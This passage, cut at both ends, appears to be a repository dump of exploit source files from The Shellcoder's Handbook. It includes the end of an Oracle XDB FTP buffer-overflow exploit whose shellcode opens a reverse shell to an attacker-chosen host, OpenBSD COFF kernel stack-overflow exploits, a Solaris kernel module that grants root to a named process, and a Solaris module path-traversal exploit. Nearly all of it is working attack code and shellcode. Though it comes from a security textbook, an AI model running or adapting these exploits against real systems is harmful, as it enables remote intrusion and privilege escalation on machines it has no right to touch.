"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66" 44 | "\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45" 45 | "\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0" 46 | "\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84" 47 | "\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57" 48 | "\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50" 49 | "\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8" 50 | "\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 51 | "\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03" 52 | "\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 53 | "\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83" 54 | "\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41" 55 | "\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03" 56 | "\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3" 57 | "\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C" 58 | "\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8" 59 | "\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B" 60 | "\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B" 61 | "\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF" 62 | "\xFF\xFF\xFF\xFF"; 63 | 64 | char exploit_code[8000]= 65 | "UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn" 66 | "nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD" 67 | "DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST" 68 | "TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK" 69 | "LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432" 70 | "1aaaabbbbcc"; 71 | 72 | char exception_handler[8]="\x79\x9B\xf7\x77"; 73 | char short_jump[8]="\xEB\x06\x90\x90"; 74 | 75 | 76 | int main(int argc, char *argv[]) 77 | { 78 | 79 | if(argc != 6) 80 | { 81 | printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 82 | printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); 83 | printf("\n\n\tSpawns a reverse shell to specified port"); 84 | printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); 85 | printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)"); 86 | printf("\n\t6th July 2003\n\n\n"); 87 | return 0; 88 | } 89 | 90 | strncpy(host,argv[1],250); 91 | if(StartWinsock()==0) 92 | return printf("Error starting Winsock.\n"); 93 | 94 | SetUpExploit(argv[4],atoi(argv[5])); 95 | 96 | strcat(exploit_code,short_jump); 97 | strcat(exploit_code,exception_handler); 98 | strcat(exploit_code,exploit); 99 | strcat(exploit_code,"\r\n"); 100 | 101 | GainControlOfOracle(argv[2],argv[3]); 102 | 103 | return 0; 104 | 105 | } 106 | 107 | 108 | int SetUpExploit(char *myip, int myport) 109 | { 110 | unsigned int ip=0; 111 | unsigned short prt=0; 112 | char *ipt=""; 113 | char *prtt=""; 114 | 115 | ip = inet_addr(myip); 116 | 117 | ipt = (char*)&ip; 118 | exploit[191]=ipt[0]; 119 | exploit[192]=ipt[1]; 120 | exploit[193]=ipt[2]; 121 | exploit[194]=ipt[3]; 122 | 123 | // set the TCP port to connect on 124 | // netcat should be listening on this port 125 | // e.g. nc -l -p 80 126 | 127 | prt = htons((unsigned short)myport); 128 | prt = prt ^ 0xFFFF; 129 | prtt = (char *) &prt; 130 | exploit[209]=prtt[0]; 131 | exploit[210]=prtt[1]; 132 | 133 | return 0; 134 | } 135 | 136 | 137 | int StartWinsock() 138 | { 139 | int err=0; 140 | WORD wVersionRequested; 141 | WSADATA wsaData; 142 | 143 | wVersionRequested = MAKEWORD( 2, 0 ); 144 | err = WSAStartup( wVersionRequested, &wsaData ); 145 | if ( err != 0 ) 146 | return 0; 147 | if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) 148 | { 149 | WSACleanup( ); 150 | return 0; 151 | } 152 | 153 | if (isalpha(host[0])) 154 | { 155 | he = gethostbyname(host); 156 | s_sa.sin_addr.s_addr=INADDR_ANY; 157 | s_sa.sin_family=AF_INET; 158 | memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); 159 | } 160 | else 161 | { 162 | addr = inet_addr(host); 163 | s_sa.sin_addr.s_addr=INADDR_ANY; 164 | s_sa.sin_family=AF_INET; 165 | memcpy(&s_sa.sin_addr,&addr,4); 166 | he = (struct hostent *)1; 167 | } 168 | 169 | if (he == NULL) 170 | { 171 | return 0; 172 | } 173 | return 1; 174 | } 175 | 176 | 177 | 178 | int GainControlOfOracle(char *user, char *pass) 179 | { 180 | 181 | char usercmd[260]="user "; 182 | char passcmd[260]="pass "; 183 | char resp[1600]=""; 184 | int snd=0,rcv=0; 185 | struct sockaddr_in r_addr; 186 | SOCKET sock; 187 | 188 | 189 | strncat(usercmd,user,230); 190 | strcat(usercmd,"\r\n"); 191 | strncat(passcmd,pass,230); 192 | strcat(passcmd,"\r\n"); 193 | 194 | 195 | sock=socket(AF_INET,SOCK_STREAM,0); 196 | if (sock==INVALID_SOCKET) 197 | return printf(" sock error"); 198 | 199 | r_addr.sin_family=AF_INET; 200 | r_addr.sin_addr.s_addr=INADDR_ANY; 201 | r_addr.sin_port=htons((unsigned short)0); 202 | s_sa.sin_port=htons((unsigned short)2100); 203 | 204 | 205 | if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) 206 | return printf("Connect error"); 207 | 208 | rcv = recv(sock,resp,1500,0); 209 | printf("%s",resp); 210 | ZeroMemory(resp,1600); 211 | 212 | snd=send(sock, usercmd , strlen(usercmd) , 0); 213 | rcv = recv(sock,resp,1500,0); 214 | printf("%s",resp); 215 | ZeroMemory(resp,1600); 216 | 217 | snd=send(sock, passcmd , strlen(passcmd) , 0); 218 | rcv = recv(sock,resp,1500,0); 219 | printf("%s",resp); 220 | if(resp[0]=='5') 221 | { 222 | closesocket(sock); 223 | return printf("Failed to log in using user %s and password %s.\n",user,pass); 224 | } 225 | ZeroMemory(resp,1600); 226 | 227 | snd=send(sock, exploit_code, strlen(exploit_code) , 0); 228 | 229 | Sleep(2000); 230 | 231 | closesocket(sock); 232 | return 0; 233 | } 234 | -------------------------------------------------------------------------------- /Chapter_23/Shellcoders23-OpenBSD-select()-exploit.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 23: Kernel Overflows 10 | OpenBSD select() kernel stack buffer overflow 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | sys_select(p, v, retval) 19 | register struct proc *p; 20 | void *v; 21 | register_t *retval; 22 | { 23 | register struct sys_select_args /* { 24 | syscallarg(int) nd; 25 | syscallarg(fd_set *) in; 26 | syscallarg(fd_set *) ou; 27 | syscallarg(fd_set *) ex; 28 | syscallarg(struct timeval *) tv; 29 | } */ *uap = v; 30 | fd_set bits[6], *pibits[3], *pobits[3]; 31 | struct timeval atv; 32 | int s, ncoll, error = 0, timo; 33 | u_int ni; 34 | 35 | [1] if (SCARG(uap, nd) > p->p_fd->fd_nfiles) { 36 | /* forgiving; slightly wrong */ 37 | SCARG(uap, nd) = p->p_fd->fd_nfiles; 38 | } 39 | [2] ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask); 40 | [3] if (SCARG(uap, nd) > FD_SETSIZE) { 41 | 42 | [deleted] 43 | 44 | #define getbits(name, x) 45 | [4] if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), 46 | (caddr_t)pibits[x], ni))) 47 | goto done; 48 | [5] getbits(in, 0); 49 | getbits(ou, 1); 50 | getbits(ex, 2); 51 | #undef getbits 52 | 53 | [deleted] 54 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24-OpenBSD-exploit1-c.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | obsd_ex1.c 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | ------------------------------ obsd_ex1.c --------------------------------- 19 | 20 | /** (c) 2003 Sinan "noir" Eren **/ 21 | /** noir@olympos.org | noir@uberhax0r.net **/ 22 | 23 | /** creates a fake COFF executable with large .shlib section size **/ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | unsigned char shellcode[] = 34 | "\xcc\xcc"; /* only int3 (debug interrupt) at the moment */ 35 | 36 | #define ZERO(p) memset(&p, 0x00, sizeof(p)) 37 | 38 | /* 39 | * COFF file header 40 | */ 41 | 42 | struct coff_filehdr { 43 | u_short f_magic; /* magic number */ 44 | u_short f_nscns; /* # of sections */ 45 | long f_timdat; /* timestamp */ 46 | long f_symptr; /* file offset of symbol table */ 47 | long f_nsyms; /* # of symbol table entries */ 48 | u_short f_opthdr; /* size of optional header */ 49 | u_short f_flags; /* flags */ 50 | }; 51 | 52 | /* f_magic flags */ 53 | #define COFF_MAGIC_I386 0x14c 54 | 55 | /* f_flags */ 56 | #define COFF_F_RELFLG 0x1 57 | #define COFF_F_EXEC 0x2 58 | #define COFF_F_LNNO 0x4 59 | #define COFF_F_LSYMS 0x8 60 | #define COFF_F_SWABD 0x40 61 | #define COFF_F_AR16WR 0x80 62 | #define COFF_F_AR32WR 0x100 63 | 64 | /* 65 | * COFF system header 66 | */ 67 | 68 | struct coff_aouthdr { 69 | short a_magic; 70 | short a_vstamp; 71 | long a_tsize; 72 | long a_dsize; 73 | long a_bsize; 74 | long a_entry; 75 | long a_tstart; 76 | long a_dstart; 77 | }; 78 | 79 | /* magic */ 80 | #define COFF_ZMAGIC 0413 81 | 82 | /* 83 | * COFF section header 84 | */ 85 | 86 | struct coff_scnhdr { 87 | char s_name[8]; 88 | long s_paddr; 89 | long s_vaddr; 90 | long s_size; 91 | long s_scnptr; 92 | long s_relptr; 93 | long s_lnnoptr; 94 | u_short s_nreloc; 95 | u_short s_nlnno; 96 | long s_flags; 97 | }; 98 | 99 | /* s_flags */ 100 | #define COFF_STYP_TEXT 0x20 101 | #define COFF_STYP_DATA 0x40 102 | #define COFF_STYP_SHLIB 0x800 103 | 104 | int 105 | main(int argc, char **argv) 106 | { 107 | u_int i, fd, debug = 0; 108 | u_char *ptr, *shptr; 109 | u_long *lptr, offset; 110 | char *args[] = { "./ibcs2own", NULL}; 111 | char *envs[] = { "RIP=theo", NULL}; 112 | //COFF structures 113 | struct coff_filehdr fhdr; 114 | struct coff_aouthdr ahdr; 115 | struct coff_scnhdr scn0, scn1, scn2; 116 | 117 | if(argv[1]) { 118 | if(!strncmp(argv[1], "-v", 2)) 119 | debug = 1; 120 | else { 121 | printf("-v: verbose flag only\n"); 122 | exit(0); 123 | } 124 | } 125 | 126 | ZERO(fhdr); 127 | fhdr.f_magic = COFF_MAGIC_I386; 128 | fhdr.f_nscns = 3; //TEXT, DATA, SHLIB 129 | fhdr.f_timdat = 0xdeadbeef; 130 | fhdr.f_symptr = 0x4000; 131 | fhdr.f_nsyms = 1; 132 | fhdr.f_opthdr = sizeof(ahdr); //AOUT header size 133 | fhdr.f_flags = COFF_F_EXEC; 134 | 135 | ZERO(ahdr); 136 | ahdr.a_magic = COFF_ZMAGIC; 137 | ahdr.a_tsize = 0; 138 | ahdr.a_dsize = 0; 139 | ahdr.a_bsize = 0; 140 | ahdr.a_entry = 0x10000; 141 | ahdr.a_tstart = 0; 142 | ahdr.a_dstart = 0; 143 | 144 | ZERO(scn0); 145 | memcpy(&scn0.s_name, ".text", 5); 146 | scn0.s_paddr = 0x10000; 147 | scn0.s_vaddr = 0x10000; 148 | scn0.s_size = 4096; 149 | //file offset of .text segment 150 | scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 151 | scn0.s_relptr = 0; 152 | scn0.s_lnnoptr = 0; 153 | scn0.s_nreloc = 0; 154 | scn0.s_nlnno = 0; 155 | scn0.s_flags = COFF_STYP_TEXT; 156 | 157 | ZERO(scn1); 158 | memcpy(&scn1.s_name, ".data", 5); 159 | scn1.s_paddr = 0x10000 - 4096; 160 | scn1.s_vaddr = 0x10000 - 4096; 161 | scn1.s_size = 4096; 162 | //file offset of .data segment 163 | scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 164 | scn1.s_relptr = 0; 165 | scn1.s_lnnoptr = 0; 166 | scn1.s_nreloc = 0; 167 | scn1.s_nlnno = 0; 168 | scn1.s_flags = COFF_STYP_DATA; 169 | 170 | ZERO(scn2); 171 | memcpy(&scn2.s_name, ".shlib", 6); 172 | scn2.s_paddr = 0; 173 | scn2.s_vaddr = 0; 174 | 175 | //overflow vector!!! 176 | scn2.s_size = 0xb0; /* offset from start of buffer to saved eip */ 177 | 178 | //file offset of .shlib segment 179 | scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + (2*4096); 180 | scn2.s_relptr = 0; 181 | scn2.s_lnnoptr = 0; 182 | scn2.s_nreloc = 0; 183 | scn2.s_nlnno = 0; 184 | scn2.s_flags = COFF_STYP_SHLIB; 185 | 186 | ptr = (char *) malloc(sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + \ 187 | 3*4096); 188 | memset(ptr, 0xcc, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096); 189 | 190 | 191 | memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); 192 | offset = sizeof(fhdr); 193 | 194 | memcpy((char *) (ptr+offset), (char *) &ahdr, sizeof(ahdr)); 195 | offset += sizeof(ahdr); 196 | 197 | memcpy((char *) (ptr+offset), (char *) &scn0, sizeof(scn0)); 198 | offset += sizeof(scn0); 199 | 200 | memcpy((char *) (ptr+offset), (char *) &scn1, sizeof(scn1)); 201 | offset += sizeof(scn1); 202 | 203 | memcpy((char *) (ptr+offset), (char *) &scn2, sizeof(scn2)); 204 | 205 | lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \ 206 | (sizeof(scn0)*3) + (2*4096) + 0xb0 - 8); 207 | 208 | shptr = (char *) malloc(4096); 209 | if(debug) 210 | printf("payload adr: 0x%.8x\n", shptr); 211 | memset(shptr, 0xcc, 4096); 212 | 213 | *lptr++ = 0xdeadbeef; 214 | *lptr = (u_long) shptr; 215 | 216 | memcpy(shptr, shellcode, sizeof(shellcode)-1); 217 | 218 | unlink("./ibcs2own"); /* remove the left overs from prior executions */ 219 | 220 | if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) { 221 | perror("open"); 222 | exit(-1); 223 | } 224 | 225 | write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + (4096*3)); 226 | close(fd); 227 | free(ptr); 228 | 229 | execve(args[0], args, envs); 230 | perror("execve"); 231 | 232 | } 233 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24-moka-c.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | moka.c 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | ----------------------------- moka.c ------------------------------------------ 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | #include 33 | extern struct mod_ops mod_miscops; 34 | 35 | int g3mm3(void); 36 | 37 | int g3mm3() 38 | { 39 | 40 | register proc_t *p; 41 | register proc_t *pp; 42 | cred_t *cr, *newcr; 43 | 44 | mutex_enter(&pidlock); 45 | for (p = practive; p != NULL; p = p->p_next) { 46 | 47 | if(strstr(p->p_user.u_comm, (char *) "o0o0")) { 48 | 49 | pp = p->p_parent; 50 | newcr = crget(); 51 | 52 | mutex_enter(&pp->p_crlock); 53 | cr = pp->p_cred; 54 | crcopy_to(cr, newcr); 55 | pp->p_cred = newcr; 56 | newcr->cr_uid = 0; 57 | mutex_exit(&pp->p_crlock); 58 | 59 | } 60 | 61 | continue; 62 | 63 | } 64 | 65 | mutex_exit(&pidlock); 66 | 67 | return 1; 68 | } 69 | 70 | static struct modlmisc modlmisc = 71 | { 72 | &mod_miscops, 73 | "u_comm" 74 | }; 75 | 76 | static struct modlinkage modlinkage = 77 | { 78 | MODREV_1, 79 | (void *) &modlmisc, 80 | NULL 81 | }; 82 | 83 | int _init(void) 84 | { 85 | int i; 86 | 87 | if ((i = mod_install(&modlinkage)) != 0) 88 | //cmn_err(CE_NOTE, ""); 89 | ; 90 | #ifdef _DEBUG 91 | else 92 | cmn_err(CE_NOTE, "0o0o0o0o installed o0o0o0o0o0o0"); 93 | #endif 94 | 95 | i = g3mm3(); 96 | return i; 97 | } 98 | 99 | int _info(struct modinfo *modinfop) 100 | { 101 | return (mod_info(&modlinkage, modinfop)); 102 | } 103 | 104 | 105 | int _fini(void) 106 | { 107 | int i; 108 | 109 | if ((i = mod_remove(&modlinkage)) != 0) 110 | //cmn_err(CE_NOTE, "not removed"); 111 | ; 112 | #ifdef DEBUG 113 | else 114 | cmn_err(CE_NOTE, "removed"); 115 | #endif 116 | 117 | return i; 118 | } 119 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24-solaris-vfs_getvfssw()-exploit.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | ------------ o0o0.c ---------- 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | /*int sysfs(int opcode, const char *fsname); */ 25 | 26 | int 27 | main(int argc, char **argv) 28 | { 29 | char modname[] = "../../../tmp/o0"; 30 | char buf[4096]; 31 | char ver[32], *ptr; 32 | int sixtyfour = 0; 33 | 34 | memset((char *) buf, 0x00, 4096); 35 | if(sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) { 36 | perror("sysinfo"); 37 | exit(0); 38 | } 39 | 40 | if(strstr(buf, "sparcv9")) 41 | sixtyfour = 1; 42 | 43 | memset((char *) ver, 0x00, 32); 44 | if(sysinfo(SI_RELEASE, (char *) ver, 32) < 0) { 45 | perror("sysinfo"); 46 | exit(0); 47 | } 48 | 49 | ptr = (char *) strstr(ver, "."); 50 | if(!ptr) { 51 | fprintf(stderr, "can't grab release version!\n"); 52 | exit(0); 53 | } 54 | ptr++; 55 | 56 | memset((char *) buf, 0x00, 4096); 57 | if(sixtyfour) 58 | snprintf(buf, sizeof(buf)-1, "cp ./%s/o064 /tmp/sparcv9/o0", ptr); 59 | else 60 | snprintf(buf, sizeof(buf)-1, "cp ./%s/o032 /tmp/o0", ptr); 61 | 62 | if(sixtyfour) 63 | if(mkdir("/tmp/sparcv9", 0755) < 0) { 64 | perror("mkdir"); 65 | exit(0); 66 | } 67 | 68 | system(buf); 69 | 70 | sysfs(GETFSIND, modname); 71 | //perror("hoe!"); 72 | 73 | if(sixtyfour) 74 | system("/usr/bin/rm -rf /tmp/sparcv9"); 75 | else 76 | system("/usr/bin/rm -f /tmp/o0"); 77 | 78 | } 79 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | exec_ibcs2_coff_prep_zmagic() kernel stack overflow 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | ----------------------------- coff_ex.c -------------------------------------- 19 | 20 | /** OpenBSD 2.x - 3.3 **/ 21 | /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow **/ 22 | /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/ 23 | /** in the default install **/ 24 | 25 | /** Copyright Feb 26 2003 Sinan "noir" Eren **/ 26 | /** noir@olympos.org | noir@uberhax0r.net **/ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | /* kernel_sc.s shellcode */ 37 | 38 | unsigned char shellcode[] = 39 | "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" 40 | "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" 41 | "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b" 42 | "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10" 43 | "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a" 44 | "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" 45 | "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0" 46 | "\x75\xef\x47\x31\xc0\x57\xc3"; 47 | 48 | /* iret_sc.s */ 49 | 50 | unsigned char iret_shellcode[] = 51 | "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" 52 | "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" 53 | "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00" 54 | "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a" 55 | "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00" 56 | "\x6a\x17"; 57 | 58 | unsigned char pusheip[] = 59 | "\x68\x00\x00\x00\x00"; /* fill eip */ 60 | 61 | unsigned char iret[] = 62 | "\xcf"; 63 | 64 | unsigned char exitsh[] = 65 | "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */ 66 | 67 | 68 | #define ZERO(p) memset(&p, 0x00, sizeof(p)) 69 | 70 | /* 71 | * COFF file header 72 | */ 73 | 74 | struct coff_filehdr { 75 | u_short f_magic; /* magic number */ 76 | u_short f_nscns; /* # of sections */ 77 | long f_timdat; /* timestamp */ 78 | long f_symptr; /* file offset of symbol table */ 79 | long f_nsyms; /* # of symbol table entries */ 80 | u_short f_opthdr; /* size of optional header */ 81 | u_short f_flags; /* flags */ 82 | }; 83 | 84 | /* f_magic flags */ 85 | #define COFF_MAGIC_I386 0x14c 86 | 87 | /* f_flags */ 88 | #define COFF_F_RELFLG 0x1 89 | #define COFF_F_EXEC 0x2 90 | #define COFF_F_LNNO 0x4 91 | #define COFF_F_LSYMS 0x8 92 | #define COFF_F_SWABD 0x40 93 | #define COFF_F_AR16WR 0x80 94 | #define COFF_F_AR32WR 0x100 95 | 96 | /* 97 | * COFF system header 98 | */ 99 | 100 | struct coff_aouthdr { 101 | short a_magic; 102 | short a_vstamp; 103 | long a_tsize; 104 | long a_dsize; 105 | long a_bsize; 106 | long a_entry; 107 | long a_tstart; 108 | long a_dstart; 109 | }; 110 | 111 | /* magic */ 112 | #define COFF_ZMAGIC 0413 113 | 114 | /* 115 | * COFF section header 116 | */ 117 | 118 | struct coff_scnhdr { 119 | char s_name[8]; 120 | long s_paddr; 121 | long s_vaddr; 122 | long s_size; 123 | long s_scnptr; 124 | long s_relptr; 125 | long s_lnnoptr; 126 | u_short s_nreloc; 127 | u_short s_nlnno; 128 | long s_flags; 129 | }; 130 | 131 | /* s_flags */ 132 | #define COFF_STYP_TEXT 0x20 133 | #define COFF_STYP_DATA 0x40 134 | #define COFF_STYP_SHLIB 0x800 135 | 136 | 137 | void get_proc(pid_t, struct kinfo_proc *); 138 | void sig_handler(); 139 | 140 | int 141 | main(int argc, char **argv) 142 | { 143 | u_int i, fd, debug = 0; 144 | u_char *ptr, *shptr; 145 | u_long *lptr; 146 | u_long pprocadr, offset; 147 | struct kinfo_proc kp; 148 | char *args[] = { "./ibcs2own", NULL}; 149 | char *envs[] = { "RIP=theo", NULL}; 150 | //COFF structures 151 | struct coff_filehdr fhdr; 152 | struct coff_aouthdr ahdr; 153 | struct coff_scnhdr scn0, scn1, scn2; 154 | 155 | if(argv[1]) { 156 | if(!strncmp(argv[1], "-v", 2)) 157 | debug = 1; 158 | else { 159 | printf("-v: verbose flag only\n"); 160 | exit(0); 161 | } 162 | } 163 | 164 | ZERO(fhdr); 165 | fhdr.f_magic = COFF_MAGIC_I386; 166 | fhdr.f_nscns = 3; //TEXT, DATA, SHLIB 167 | fhdr.f_timdat = 0xdeadbeef; 168 | fhdr.f_symptr = 0x4000; 169 | fhdr.f_nsyms = 1; 170 | fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size 171 | fhdr.f_flags = COFF_F_EXEC; 172 | 173 | ZERO(ahdr); 174 | ahdr.a_magic = COFF_ZMAGIC; 175 | ahdr.a_tsize = 0; 176 | ahdr.a_dsize = 0; 177 | ahdr.a_bsize = 0; 178 | ahdr.a_entry = 0x10000; 179 | ahdr.a_tstart = 0; 180 | ahdr.a_dstart = 0; 181 | 182 | ZERO(scn0); 183 | memcpy(&scn0.s_name, ".text", 5); 184 | scn0.s_paddr = 0x10000; 185 | scn0.s_vaddr = 0x10000; 186 | scn0.s_size = 4096; 187 | scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 188 | //file offset of .text segment 189 | scn0.s_relptr = 0; 190 | scn0.s_lnnoptr = 0; 191 | scn0.s_nreloc = 0; 192 | scn0.s_nlnno = 0; 193 | scn0.s_flags = COFF_STYP_TEXT; 194 | 195 | ZERO(scn1); 196 | memcpy(&scn1.s_name, ".data", 5); 197 | scn1.s_paddr = 0x10000 - 4096; 198 | scn1.s_vaddr = 0x10000 - 4096; 199 | scn1.s_size = 4096; 200 | scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 201 | //file offset of .data segment 202 | scn1.s_relptr = 0; 203 | scn1.s_lnnoptr = 0; 204 | scn1.s_nreloc = 0; 205 | scn1.s_nlnno = 0; 206 | scn1.s_flags = COFF_STYP_DATA; 207 | 208 | ZERO(scn2); 209 | memcpy(&scn2.s_name, ".shlib", 6); 210 | scn2.s_paddr = 0; 211 | scn2.s_vaddr = 0; 212 | scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128 213 | scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 214 | //file offset of .data segment 215 | scn2.s_relptr = 0; 216 | scn2.s_lnnoptr = 0; 217 | scn2.s_nreloc = 0; 218 | scn2.s_nlnno = 0; 219 | 